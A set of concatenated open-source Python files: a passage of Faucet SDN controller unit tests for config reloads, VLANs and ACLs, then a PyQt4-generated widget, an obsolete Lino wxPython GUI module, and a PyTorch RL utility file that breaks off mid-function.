ValveAddPortTrafficTestCase(ValveTestBases.ValveTestNetwork): """Test addition of a port with traffic.""" # NOTE: This needs to use 'Generic' hardware, # as GenericTFM does not support 'warm' start REQUIRE_TFM = False CONFIG = """ dps: s1: dp_id: 1 hardware: Generic interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] """ MORE_CONFIG = """ dps: s1: dp_id: 1 hardware: Generic interfaces: p1: number: 1 tagged_vlans: [0x100] p2: number: 2 tagged_vlans: [0x100] p3: number: 3 tagged_vlans: [0x100] """ @staticmethod def _inport_flows(in_port, ofmsgs): return [ ofmsg for ofmsg in ValveTestBases.flowmods_from_flows(ofmsgs) if ofmsg.match.get('in_port') == in_port] def _learn(self, in_port): ucast_pkt = self.pkt_match(in_port, 1) ucast_pkt['in_port'] = in_port ucast_pkt['vlan_vid'] = self.V100 table = self.network.tables[self.DP_ID] self.assertTrue(table.is_output(ucast_pkt, port=CONTROLLER_PORT)) self.rcv_packet(in_port, self.V100, ucast_pkt) def _unicast_between(self, in_port, out_port, not_out=1): ucast_match = self.pkt_match(in_port, out_port) ucast_match['in_port'] = in_port ucast_match['vlan_vid'] = self.V100 table = self.network.tables[self.DP_ID] self.assertTrue(table.is_output(ucast_match, port=out_port)) self.assertFalse(table.is_output(ucast_match, port=not_out)) def setUp(self): initial_ofmsgs = self.setup_valves(self.CONFIG)[self.DP_ID] self.assertFalse(self._inport_flows(3, initial_ofmsgs)) def test_port_add_no_ofmsgs(self): """New config does not generate new flows.""" update_ofmsgs = self.update_config(self.MORE_CONFIG, reload_type='warm')[self.DP_ID] self.assertFalse(self._inport_flows(3, update_ofmsgs)) def test_port_add_link_state(self): """New port can be added in link-down state.""" self.update_config(self.MORE_CONFIG, reload_type='warm') self.add_port(3, link_up=False) self.port_expected_status(3, 0) self.set_port_link_up(3) self.port_expected_status(3, 1) def test_port_add_traffic(self): """New port can be added, and pass traffic.""" self.update_config(self.MORE_CONFIG, reload_type='warm') self.add_port(3) self._learn(2) self._learn(3) self._unicast_between(2, 3) self._unicast_between(3, 2) class ValveWarmStartVLANTestCase(ValveTestBases.ValveTestNetwork): """Test change of port VLAN only is a warm start.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 9 tagged_vlans: [0x100] p2: number: 11 tagged_vlans: [0x100] p3: number: 13 tagged_vlans: [0x100] p4: number: 14 native_vlan: 0x200 """ % DP1_CONFIG WARM_CONFIG = """ dps: s1: %s interfaces: p1: number: 9 tagged_vlans: [0x100] p2: number: 11 tagged_vlans: [0x100] p3: number: 13 tagged_vlans: [0x100] p4: number: 14 native_vlan: 0x300 """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def test_warm_start(self): """Test VLAN change is warm startable and metrics maintained.""" self.update_and_revert_config(self.CONFIG, self.WARM_CONFIG, 'warm') self.rcv_packet(9, 0x100, { 'eth_src': self.P1_V100_MAC, 'eth_dst': self.UNKNOWN_MAC, 'ipv4_src': '10.0.0.1', 'ipv4_dst': '10.0.0.2'}) vlan_labels = {'vlan': str(int(0x100))} port_labels = {'port': 'p1', 'port_description': 'p1'} port_labels.update(vlan_labels) def verify_func(): self.assertEqual( 1, self.get_prom('vlan_hosts_learned', labels=vlan_labels)) self.assertEqual( 1, self.get_prom('port_vlan_hosts_learned', labels=port_labels)) verify_func() self.update_config(self.WARM_CONFIG, reload_type='warm') verify_func() class ValveDeleteVLANTestCase(ValveTestBases.ValveTestNetwork): """Test deleting VLAN.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100, 0x200] p2: number: 2 native_vlan: 0x200 """ % DP1_CONFIG LESS_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x200] p2: number: 2 native_vlan: 0x200 """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def test_delete_vlan(self): """Test VLAN can be deleted.""" self.update_and_revert_config(self.CONFIG, self.LESS_CONFIG, 'cold') class ValveChangeDPTestCase(ValveTestBases.ValveTestNetwork): """Test changing DP.""" CONFIG = """ dps: s1: %s priority_offset: 4321 interfaces: p1: number: 1 native_vlan: 0x100 p2: number: 2 native_vlan: 0x100 """ % DP1_CONFIG NEW_CONFIG = """ dps: s1: %s priority_offset: 1234 interfaces: p1: number: 1 native_vlan: 0x100 p2: number: 2 native_vlan: 0x100 """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config with priority offset""" self.setup_valves(self.CONFIG) def test_change_dp(self): """Test DP changed.""" self.update_and_revert_config(self.CONFIG, self.NEW_CONFIG, 'cold') class ValveAddVLANTestCase(ValveTestBases.ValveTestNetwork): """Test adding VLAN.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100, 0x200] p2: number: 2 tagged_vlans: [0x100] """ % DP1_CONFIG MORE_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 tagged_vlans: [0x100, 0x200] p2: number: 2 tagged_vlans: [0x100, 0x300] """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def test_add_vlan(self): """Test VLAN can added.""" self.update_and_revert_config(self.CONFIG, self.MORE_CONFIG, 'cold') class ValveChangeACLTestCase(ValveTestBases.ValveTestNetwork): """Test changes to ACL on a port.""" CONFIG = """ acls: acl_same_a: - rule: actions: allow: 1 acl_same_b: - rule: actions: allow: 1 acl_diff_c: - rule: actions: allow: 0 dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 acl_in: acl_same_a p2: number: 2 native_vlan: 0x200 """ % DP1_CONFIG SAME_CONTENT_CONFIG = """ acls: acl_same_a: - rule: actions: allow: 1 acl_same_b: - rule: actions: allow: 1 acl_diff_c: - rule: actions: allow: 0 dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 acl_in: acl_same_b p2: number: 2 native_vlan: 0x200 """ % DP1_CONFIG DIFF_CONTENT_CONFIG = """ acls: acl_same_a: - rule: actions: allow: 1 acl_same_b: - rule: actions: allow: 1 acl_diff_c: - rule: actions: allow: 0 dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 acl_in: acl_diff_c p2: number: 2 native_vlan: 0x200 """ % DP1_CONFIG def setUp(self): """Setup basic ACL config""" self.setup_valves(self.CONFIG) def test_change_port_acl(self): """Test port ACL can be changed.""" self.update_and_revert_config(self.CONFIG, self.SAME_CONTENT_CONFIG, 'warm') self.update_config(self.SAME_CONTENT_CONFIG, reload_type='warm') self.rcv_packet(1, 0x100, { 'eth_src': self.P1_V100_MAC, 'eth_dst': self.UNKNOWN_MAC, 'ipv4_src': '10.0.0.1', 'ipv4_dst': '10.0.0.2'}) vlan_labels = {'vlan': str(int(0x100))} port_labels = {'port': 'p1', 'port_description': 'p1'} port_labels.update(vlan_labels) def verify_func(): self.assertEqual( 1, self.get_prom('vlan_hosts_learned', labels=vlan_labels)) self.assertEqual( 1, self.get_prom('port_vlan_hosts_learned', labels=port_labels)) verify_func() # ACL changed but we kept the learn cache. self.update_config(self.DIFF_CONTENT_CONFIG, reload_type='warm') verify_func() class ValveChangeMirrorTestCase(ValveTestBases.ValveTestNetwork): """Test changes mirroring port.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 p2: number: 2 output_only: True p3: number: 3 native_vlan: 0x200 """ % DP1_CONFIG MIRROR_CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 p2: number: 2 mirror: p1 p3: number: 3 native_vlan: 0x200 """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def test_change_port_acl(self): """Test port ACL can be changed.""" self.update_and_revert_config(self.CONFIG, self.MIRROR_CONFIG, reload_type='warm') vlan_labels = {'vlan': str(int(0x100))} port_labels = {'port': 'p1', 'port_description': 'p1'} port_labels.update(vlan_labels) def verify_prom(): self.assertEqual( 1, self.get_prom('vlan_hosts_learned', labels=vlan_labels)) self.assertEqual( 1, self.get_prom('port_vlan_hosts_learned', labels=port_labels)) self.rcv_packet(1, 0x100, { 'eth_src': self.P1_V100_MAC, 'eth_dst': self.UNKNOWN_MAC, 'ipv4_src': '10.0.0.1', 'ipv4_dst': '10.0.0.2'}) verify_prom() # Now mirroring port 1 but we kept the cache. self.update_config(self.MIRROR_CONFIG, reload_type='warm') verify_prom() # Now unmirror again. self.update_config(self.CONFIG, reload_type='warm') verify_prom() class ValveACLTestCase(ValveTestBases.ValveTestNetwork): """Test ACL drop/allow and reloading.""" def setUp(self): self.setup_valves(CONFIG) def test_vlan_acl_deny(self): """Test VLAN ACL denies a packet.""" acl_config = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: v100 p2: number: 2 native_vlan: v200 tagged_vlans: [v100] p3: number: 3 tagged_vlans: [v100, v200] p4: number: 4 tagged_vlans: [v200] p5: number: 5 native_vlan: v300 vlans: v100: vid: 0x100 v200: vid: 0x200 acl_in: drop_non_ospf_ipv4 v300: vid: 0x300 acls: drop_non_ospf_ipv4: - rule: nw_dst: '224.0.0.5' dl_type: 0x800 actions: allow: 1 - rule: dl_type: 0x800 actions: allow: 0 """ % DP1_CONFIG drop_match = { 'in_port': 2, 'vlan_vid': 0, 'eth_type': 0x800, 'ipv4_dst': '192.0.2.1'} accept_match = { 'in_port': 2, 'vlan_vid': 0, 'eth_type': 0x800, 'ipv4_dst': '224.0.0.5'} table = self.network.tables[self.DP_ID] # base case for match in (drop_match, accept_match): self.assertTrue( table.is_output(match, port=3, vid=self.V200), msg='Packet not output before adding ACL') def verify_func(): self.flap_port(2) self.assertFalse( table.is_output(drop_match), msg='Packet not blocked by ACL') self.assertTrue( table.is_output(accept_match, port=3, vid=self.V200), msg='Packet not allowed by ACL') self.update_and_revert_config( CONFIG, acl_config, reload_type='cold', verify_func=verify_func) class ValveEgressACLTestCase(ValveTestBases.ValveTestNetwork): """Test ACL drop/allow and reloading.""" def setUp(self): self.setup_valves(CONFIG) def test_vlan_acl_deny(self): """Test VLAN ACL denies a packet.""" allow_host_v6 = 'fc00:200::1:1' deny_host_v6 = 'fc00:200::1:2' faucet_v100_vip = 'fc00:100::1' faucet_v200_vip = 'fc00:200::1' acl_config = """ dps: s1: {dp1_config} interfaces: p1: number: 1 native_vlan: v100 p2: number: 2 native_vlan: v200 tagged_vlans: [v100] p3: number: 3 tagged_vlans: [v100, v200] p4: number: 4 tagged_vlans: [v200] vlans: v100: vid: 0x100 faucet_mac: '{mac}' faucet_vips: ['{v100_vip}/64'] v200: vid: 0x200 faucet_mac: '{mac}' faucet_vips: ['{v200_vip}/64'] acl_out: drop_non_allow_host_v6 minimum_ip_size_check: false routers: r_v100_v200: vlans: [v100, v200] acls: drop_non_allow_host_v6: - rule: ipv6_dst: '{allow_host}' eth_type: 0x86DD actions: allow: 1 - rule: eth_type: 0x86DD actions: allow: 0 """.format(dp1_config=DP1_CONFIG, mac=FAUCET_MAC, v100_vip=faucet_v100_vip, v200_vip=faucet_v200_vip, allow_host=allow_host_v6) l2_drop_match = { 'in_port': 2, 'eth_dst': self.P3_V200_MAC, 'vlan_vid': 0, 'eth_type': 0x86DD, 'ipv6_dst': deny_host_v6} l2_accept_match = { 'in_port': 3, 'eth_dst': self.P2_V200_MAC, 'vlan_vid': 0x200 | ofp.OFPVID_PRESENT, 'eth_type': 0x86DD, 'ipv6_dst': allow_host_v6} v100_accept_match = {'in_port': 1, 'vlan_vid': 0} table = self.network.tables[self.DP_ID] # base case for match in (l2_drop_match, l2_accept_match): self.assertTrue( table.is_output(match, port=4), msg='Packet not output before adding ACL') def verify_func(): self.assertTrue( table.is_output(v100_accept_match, port=3), msg='Packet not output when on vlan with no ACL') self.assertFalse( table.is_output(l2_drop_match, port=3), msg='Packet not blocked by ACL') self.assertTrue( table.is_output(l2_accept_match, port=2), msg='Packet not allowed by ACL') # unicast self.rcv_packet(2, 0x200, { 'eth_src': self.P2_V200_MAC, 'eth_dst': self.P3_V200_MAC, 'vid': 0x200, 'ipv6_src': allow_host_v6, 'ipv6_dst': deny_host_v6, 'neighbor_advert_ip': allow_host_v6}) self.rcv_packet(3, 0x200, { 'eth_src': self.P3_V200_MAC, 'eth_dst': self.P2_V200_MAC, 'vid': 0x200, 'ipv6_src': deny_host_v6, 'ipv6_dst': allow_host_v6, 'neighbor_advert_ip': deny_host_v6}) self.assertTrue( table.is_output(l2_accept_match, port=2), msg='Packet not allowed by ACL') self.assertFalse( table.is_output(l2_drop_match, port=3), msg='Packet not blocked by ACL') # l3 l3_drop_match = { 'in_port': 1, 'eth_dst': FAUCET_MAC, 'vlan_vid': 0, 'eth_type': 0x86DD, 'ipv6_dst': deny_host_v6} l3_accept_match = { 'in_port': 1, 'eth_dst': FAUCET_MAC, 'vlan_vid': 0, 'eth_type': 0x86DD, 'ipv6_dst': allow_host_v6} self.assertTrue( table.is_output(l3_accept_match, port=2), msg='Routed packet not allowed by ACL') self.assertFalse( table.is_output(l3_drop_match, port=3), msg='Routed packet not blocked by ACL') # multicast self.update_and_revert_config(CONFIG, acl_config, 'cold', verify_func=verify_func) class ValveReloadConfigProfile(ValveTestBases.ValveTestNetwork): """Test reload processing time.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 """ % BASE_DP1_CONFIG NUM_PORTS = 100 baseline_total_tt = None def setUp(self): """Setup basic port and vlan config""" self.setup_valves(CONFIG) def test_profile_reload(self): """Test reload processing time.""" orig_config = copy.copy(self.CONFIG) def load_orig_config(): pstats_out, _ = self.profile( partial(self.update_config, orig_config)) self.baseline_total_tt = pstats_out.total_tt # pytype: disable=attribute-error for i in range(2, 100): self.CONFIG += """ p%u: number: %u native_vlan: 0x100 """ % (i, i) for i in range(5): load_orig_config() pstats_out, pstats_text = self.profile( partial(self.update_config, self.CONFIG, reload_type='cold')) cache_info = valve_of.output_non_output_actions.cache_info() self.assertGreater(cache_info.hits, cache_info.misses, msg=cache_info) total_tt_prop = ( pstats_out.total_tt / self.baseline_total_tt) # pytype: disable=attribute-error # must not be 20x slower, to ingest config for 100 interfaces than 1. # TODO: This test might have to be run separately, # since it is marginal on GitHub actions due to parallel test runs. if total_tt_prop < 20: for valve in self.valves_manager.valves.values(): for table in valve.dp.tables.values(): cache_info = table._trim_inst.cache_info() # pylint: disable=protected-access self.assertGreater(cache_info.hits, cache_info.misses, msg=cache_info) return time.sleep(i) self.fail('%f: %s' % (total_tt_prop, pstats_text)) class ValveTestVLANRef(ValveTestBases.ValveTestNetwork): """Test reference to same VLAN by name or VID.""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 333 p2: number: 2 native_vlan: threes vlans: threes: vid: 333 """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def test_vlan_refs(self): """Test same VLAN is referred to.""" vlans = self.valves_manager.valves[self.DP_ID].dp.vlans self.assertEqual(1, len(vlans)) self.assertEqual('threes', vlans[333].name, vlans[333]) self.assertEqual(2, len(vlans[333].untagged)) class ValveTestConfigHash(ValveTestBases.ValveTestNetwork): """Verify faucet_config_hash_info update after config change""" CONFIG = """ dps: s1: %s interfaces: p1: number: 1 native_vlan: 0x100 """ % DP1_CONFIG def setUp(self): """Setup basic port and vlan config""" self.setup_valves(self.CONFIG) def _get_info(self, metric, name): """"Return (single) info dict for metric""" # There doesn't seem to be a nice API for this, # so we use the prometheus client internal API metrics = list(metric.collect()) self.assertEqual(len(metrics), 1) samples = metrics[0].samples self.assertEqual(len(samples), 1) sample = samples[0] self.assertEqual(sample.name, name) return sample.labels def _check_hashes(self): """Verify and return faucet_config_hash_info labels""" labels = self._get_info(metric=self.metrics.faucet_config_hash, name='faucet_config_hash_info') files = labels['config_files'].split(',') hashes = labels['hashes'].split(',') self.assertTrue(len(files) == len(hashes) == 1) self.assertEqual(files[0], self.config_file, 'wrong config file') hash_value = config_parser_util.config_file_hash(self.config_file) self.assertEqual(hashes[0], hash_value, 'hash validation failed') return labels def _change_config(self): """Change self.CONFIG""" if '0x100' in self.CONFIG: self.CONFIG = self.CONFIG.replace('0x100', '0x200') else: self.CONFIG = self.CONFIG.replace('0x200', '0x100') self.update_config(self.CONFIG, reload_expected=True) return self.CONFIG def test_config_hash_func(self): """Verify that faucet_config_hash_func is set correctly""" labels = self._get_info(metric=self.metrics.faucet_config_hash_func, name='faucet_config_hash_func') hash_funcs = list(labels.values()) self.assertEqual(len(hash_funcs), 1, "found multiple hash functions") hash_func = hash_funcs[0] # Make sure that it matches and is supported in hashlib self.assertEqual(hash_func, config_parser_util.CONFIG_HASH_FUNC) self.assertTrue(hash_func in hashlib.algorithms_guaranteed) def test_config_hash_update(self): """Verify faucet_config_hash_info is properly updated after config""" # Verify that hashes change after config is changed old_config = self.CONFIG old_hashes = self._check_hashes() starting_hashes = old_hashes self._change_config() new_config = self.CONFIG self.assertNotEqual(old_config, new_config, 'config not changed') new_hashes = self._check_hashes() self.assertNotEqual(old_hashes, new_hashes, 'hashes not changed after config change') # Verify that hashes don't change after config isn't changed old_hashes = new_hashes self.update_config(self.CONFIG, reload_expected=False) new_hashes = self._check_hashes() self.assertEqual(old_hashes, new_hashes, "hashes changed when config didn't") # Verify that hash is restored when config is restored self._change_config() new_hashes = self._check_hashes() self.assertEqual(new_hashes, starting_hashes, 'hashes should be restored to starting values') class ValveTestConfigRevert(ValveTestBases.ValveTestNetwork): """Test configuration revert""" CONFIG = """ dps: s1: dp_id: 0x1 hardware: 'GenericTFM' interfaces: p1: number: 1 native_vlan: 0x100 """ CONFIG_AUTO_REVERT = True def setUp(self): """Setup basic port and vlan config with hardware type set""" self.setup_valves(self.CONFIG) def test_config_revert(self): """Verify config is automatically reverted if bad.""" self.assertEqual(self.get_prom('faucet_config_load_error', bare=True), 0) self.update_config('***broken***', reload_expected=True, error_expected=1) self.assertEqual(self.get_prom('faucet_config_load_error', bare=True), 1) with open(self.config_file, 'r', encoding='utf-8') as config_file: config_content = config_file.read() self.assertEqual(self.CONFIG, config_content) self.update_config(self.CONFIG + '\n', reload_expected=False, error_expected=0) more_config = self.CONFIG + """ p2: number: 2 native_vlan: 0x100 """ self.update_config(more_config, reload_expected=True, reload_type='warm', error_expected=0) class ValveTestConfigRevertBootstrap(ValveTestBases.ValveTestNetwork): """Test configuration auto reverted if bad""" BAD_CONFIG = """ *** busted *** """ GOOD_CONFIG = """ dps: s1: dp_id: 0x1 hardware: 'GenericTFM' interfaces: p1: number: 1 native_vlan: 0x100 """ CONFIG_AUTO_REVERT = True def setUp(self): """Setup invalid config""" self.setup_valves(self.BAD_CONFIG, error_expected=1) def test_config_revert(self): """Verify config is automatically reverted if bad.""" self.assertEqual(self.get_prom('faucet_config_load_error', bare=True), 1) self.update_config(self.GOOD_CONFIG + '\n', reload_expected=False, error_expected=0) self.assertEqual(self.get_prom('faucet_config_load_error', bare=True), 0) class ValveTestConfigApplied(ValveTestBases.ValveTestNetwork): """Test cases for faucet_config_applied.""" CONFIG = """ dps: s1: dp_id: 0x1 hardware: 'GenericTFM' interfaces: p1: description: "one thing" number: 1 native_vlan: 0x100 """ NEW_DESCR_CONFIG = """ dps: s1: dp_id: 0x1 hardware: 'GenericTFM' interfaces: p1: description: "another thing" number: 1 native_vlan: 0x100 """ def setUp(self): """Setup basic port and vlan config with hardware type set""" self.setup_valves(self.CONFIG) def test_config_applied_update(self): """Verify that config_applied increments after DP connect""" # 100% for a single datapath self.assertEqual(self.get_prom('faucet_config_applied', bare=True), 1.0) # Add a second datapath, which currently isn't programmed self.CONFIG += """ s2: dp_id: 0x2 hardware: 'GenericTFM' interfaces: p1: number: 1 native_vlan: 0x100 """ self.update_config(self.CONFIG, reload_expected=False) # Should be 50% self.assertEqual(self.get_prom('faucet_config_applied', bare=True), .5) # We don't have a way to simulate the second datapath connecting, # we update the statistic manually self.valves_manager.update_config_applied({0x2: True}) # Should be 100% now self.assertEqual(self.get_prom('faucet_config_applied', bare=True), 1.0) def test_description_only(self): """Test updating config description""" self.update_config(self.NEW_DESCR_CONFIG, reload_expected=False) class ValveReloadConfigTestCase(ValveTestBases.ValveTestBig): # pylint: disable=too-few-public-methods """Repeats the tests after a config reload.""" def setUp(self): super().setUp() self.flap_port(1) self.update_config(CONFIG, reload_type='warm', reload_expected=False) if __name__ == "__main__": unittest.main() # pytype: disable=module-attr
REANNZ/faucet
tests/unit/faucet/test_valve_config.py
Python
apache-2.0
36,835
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file '/data/Public/qt-learning/ui/widgets/integer3Attr.ui' # # Created: Tue Nov 14 18:49:58 2017 # by: PyQt4 UI code generator 4.6.2 # # WARNING! All changes made in this file will be lost! from PyQt4 import QtCore, QtGui class Ui_Widget(object): def setupUi(self, Widget): Widget.setObjectName("Widget") Widget.resize(402, 20) self.horizontalLayout = QtGui.QHBoxLayout(Widget) self.horizontalLayout.setSpacing(3) self.horizontalLayout.setMargin(3) self.horizontalLayout.setObjectName("horizontalLayout") self.label = QtGui.QLabel(Widget) self.label.setObjectName("label") self.horizontalLayout.addWidget(self.label) self.spinBox_1 = QtGui.QSpinBox(Widget) self.spinBox_1.setObjectName("spinBox_1") self.horizontalLayout.addWidget(self.spinBox_1) self.spinBox_2 = QtGui.QSpinBox(Widget) self.spinBox_2.setObjectName("spinBox_2") self.horizontalLayout.addWidget(self.spinBox_2) self.spinBox_3 = QtGui.QSpinBox(Widget) self.spinBox_3.setObjectName("spinBox_3") self.horizontalLayout.addWidget(self.spinBox_3) spacerItem = QtGui.QSpacerItem(237, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout.addItem(spacerItem) self.retranslateUi(Widget) QtCore.QMetaObject.connectSlotsByName(Widget) def retranslateUi(self, Widget): Widget.setWindowTitle(QtGui.QApplication.translate("Widget", "Form", None, QtGui.QApplication.UnicodeUTF8)) self.label.setText(QtGui.QApplication.translate("Widget", "Text", None, QtGui.QApplication.UnicodeUTF8))
david-cattermole/qt-learning
python/qtLearn/widgets/ui_integer3Attr.py
Python
bsd-3-clause
1,747
raise "not used" ## Copyright 2003-2005 Luc Saffre ## This file is part of the Lino project. ## Lino is free software; you can redistribute it and/or modify it ## under the terms of the GNU General Public License as published by ## the Free Software Foundation; either version 2 of the License, or ## (at your option) any later version. ## Lino is distributed in the hope that it will be useful, but WITHOUT ## ANY WARRANTY; without even the implied warranty of MERCHANTABILITY ## or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public ## License for more details. ## You should have received a copy of the GNU General Public License ## along with Lino; if not, write to the Free Software Foundation, ## Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA import wx import os from lino.adamo.widgets import Action from lino.adamo.datasource import DataCell from lino.adamo import center from lino.adamo.session import Session from gridframe import RptFrame class EventCaller(Action): "ignores the event" def __init__(self,form,meth,*args,**kw): self._form = form Action.__init__(self,meth,*args,**kw) def __call__(self,evt): #self._form.getSession().notifyMessage("%s called %s." % ( # str(evt), str(self))) self.execute() class wxDataCell(DataCell): def makeEditor(self,parent): self.editor = wx.TextCtrl(parent,-1,self.format()) #self.Bind(wx.EVT_TEXT, self.EvtText, t1) #editor.Bind(wx.EVT_CHAR, self.EvtChar) #editor.Bind(wx.EVT_SET_FOCUS, self.OnSetFocus) self.editor.Bind(wx.EVT_KILL_FOCUS, self.OnKillFocus) #editor.Bind(wx.EVT_WINDOW_DESTROY, self.OnWindowDestroy) return self.editor def OnKillFocus(self,evt): v = self.editor.GetValue() if len(v) == 0: v = None self.col.setCellValue(self.row,v) evt.Skip() class FormFrame(wx.Frame): # overviewText = "wxPython Overview" def __init__(self, form): print "FormFrame.__init__()" #self.ui = ui title = form.getLabel() #title = self.session.db.getLabel() #parent = form.getSession().getCurrentForm() parent = None wx.Frame.__init__(self, parent, -1, title, size = (400, 300), style=wx.DEFAULT_FRAME_STYLE| wx.NO_FULL_REPAINT_ON_RESIZE) wx.EVT_IDLE(self, self.OnIdle) wx.EVT_CLOSE(self, self.OnCloseWindow) wx.EVT_ICONIZE(self, self.OnIconfiy) wx.EVT_MAXIMIZE(self, self.OnMaximize) self.Centre(wx.BOTH) self.CreateStatusBar(1, wx.ST_SIZEGRIP) self.setForm(form) self.Show() def setForm(self,form): self.form = form if len(form.getMenus()) != 0: wxMenuBar = wx.MenuBar() for mnu in self.form.getMenus(): wxm = self._createMenuWidget(mnu) wxMenuBar.Append(wxm,mnu.getLabel()) self.SetMenuBar(wxMenuBar) db = self.form.getSession().db self.SetTitle(db.getLabel() +" - " \ + self.form.getLabel().replace(db.schema.HK_CHAR, '')) #self.SetBackgroundColour(wx.RED) if len(form) > 0: fieldsPanel = wx.Panel(self,-1) vbox = wx.BoxSizer(wx.VERTICAL) for cell in form: p = wx.Panel(fieldsPanel,-1) vbox.Add(p) hbox = wx.BoxSizer(wx.HORIZONTAL) label = wx.StaticText(p, -1, cell.col.rowAttr.getLabel()) #label.SetBackgroundColour(wx.GREEN) hbox.Add(label, 1, wx.ALL,10) editor = cell.makeEditor(p) hbox.Add(editor, 1, wx.ALL,10) p.SetSizer(hbox) fieldsPanel.SetSizer( vbox ) vbox = wx.BoxSizer(wx.VERTICAL) vbox.Add(fieldsPanel,1,wx.EXPAND|wx.ALL,10) buttons = form.getButtons() if len(buttons): buttonPanel = wx.Panel(self,-1) hbox = wx.BoxSizer(wx.HORIZONTAL) for (name,meth) in buttons: winId = wx.NewId() button = wx.Button(buttonPanel,winId,name, wx.DefaultPosition, wx.DefaultSize) hbox.Add(button, 1, wx.ALL,10) wx.EVT_BUTTON(self, winId, EventCaller(form,meth)) buttonPanel.SetSizer(hbox) hbox.Fit(fieldsPanel) vbox.Add(buttonPanel,1,wx.EXPAND|wx.ALL,10) self.SetAutoLayout( True ) # tell dialog to use sizer self.SetSizer( vbox ) # actually set the sizer vbox.Fit( self ) # set size to minimum size as calculated by the sizer #vbox.SetSizeHints( self ) # set size hints to honour mininum size self.Layout() def _createMenuWidget(self,mnu): wxMenu = wx.Menu() for mi in mnu.getItems(): #print repr(mi.getLabel()) #"%s must be a String" % repr(mi.getLabel()) winId = wx.NewId() doc = mi.getDoc() if doc is None: doc="" assert type(doc) == type(""),\ repr(mi) assert type(mi.getLabel()) == type(""),\ repr(mi) wxMenu.Append(winId,mi.getLabel(),doc) wx.EVT_MENU(self, winId, EventCaller(self.form, mi.execute)) return wxMenu def OnCloseWindow(self, event): self.dying = True #self.window = None self.mainMenu = None #if hasattr(self, "tbicon"): # del self.tbicon self.Destroy() def OnIdle(self, evt): #wx.LogMessage("OnIdle") evt.Skip() def OnIconfiy(self, evt): wx.LogMessage("OnIconfiy") evt.Skip() def OnMaximize(self, evt): wx.LogMessage("OnMaximize") evt.Skip() class WxSession(Session): _dataCellFactory = wxDataCell def error(self,*a): return center.center().console.error(*a) def debug(self,*a): return center.center().console.debug(*a) def info(self,*a): return center.center().console.info(*a) def showForm(self,formName,modal=False,**kw): frm = self.openForm(formName,**kw) frame = FormFrame(frm) ## if modal: ## frame.showModal() ## else: ## frame.show() def showReport(self,ds,showTitle=True,**kw): frame = RptFrame(None,-1,ds) frame.Show() class WxApp(wx.App): def __init__(self,rootSession): #center.center().setSessionFactory(WxSession) #self.session = rootSession.spawn() #rootSession.end() self.session = WxSession(db=rootSession.db, langs=rootSession.getLangs()) wx.App.__init__(self,0) def OnInit(self): wx.InitAllImageHandlers() self.session.onBeginSession() ## self.session.onStartUI() ## frame = self.session.getCurrentForm() # forms.login ## #assert frame is not None ## #print frame ## #frame = FormFrame(None, -1, form) ## self.SetTopWindow(frame) return True def OnExit(self): self.session.shutdown() ## class wxApplication(Application): ## def __init__(self,**kw): ## Application.__init__(self,**kw) ## self.wxapp = wxAppInstance(self) ## def createSession(self,**kw): ## return wxSession(self,**kw) ## def run(self): ## self.wxapp.MainLoop()
MaxTyutyunnikov/lino
obsolete/src/lino/formsold/wx/main.py
Python
gpl-3.0
7,865
import os import torch from torch.autograd import Variable USE_CUDA = torch.cuda.is_available() FLOAT = torch.cuda.FloatTensor if USE_CUDA else torch.FloatTensor def prRed(prt): print("\033[91m {}\033[00m" .format(prt)) def prGreen(prt): print("\033[92m {}\033[00m" .format(prt)) def prYellow(prt): print("\033[93m {}\033[00m" .format(prt)) def prLightPurple(prt): print("\033[94m {}\033[00m" .format(prt)) def prPurple(prt): print("\033[95m {}\033[00m" .format(prt)) def prCyan(prt): print("\033[96m {}\033[00m" .format(prt)) def prLightGray(prt): print("\033[97m {}\033[00m" .format(prt)) def prBlack(prt): print("\033[98m {}\033[00m" .format(prt)) def to_numpy(var): return var.cpu().data.numpy() if USE_CUDA else var.data.numpy() def to_tensor(ndarray, volatile=False, requires_grad=False, dtype=FLOAT): return Variable( torch.from_numpy(ndarray), volatile=volatile, requires_grad=requires_grad ).type(dtype) def soft_update(target, source, tau): for target_param, param in zip(target.parameters(), source.parameters()): target_param.data.copy_( target_param.data * (1.0 - tau) + param.data * tau ) def hard_update(target, source): for target_param, param in zip(target.parameters(), source.parameters()): target_param.data.copy_(param.data) def get_output_folder(parent_dir, env_name): """Return save folder. Assumes folders in the parent_dir have suffix -run{run number}. Finds the highest run number and sets the output folder to that number + 1. This is just convenient so that if you run the same script multiple times tensorboard can plot all of the results on the same plots with different names. Parameters ---------- parent_dir: str Path of the directory containing all experiment runs. Returns ------- parent_dir/run_dir Path to this run's save directory. """ os.makedirs(parent_dir, exist_ok=True) experiment_id = 0 for folder_name in os.listdir(parent_dir): if not os.path.isdir(os.path.join(parent_dir, folder_name)): continue try: folder_name = int(folder_name.split('-run')[-1]) if folder_name > experiment_id: experiment_id = folder_name except: pass experiment_id += 1 parent_dir = os.path.join(parent_dir, env_name) parent_dir = parent_dir + 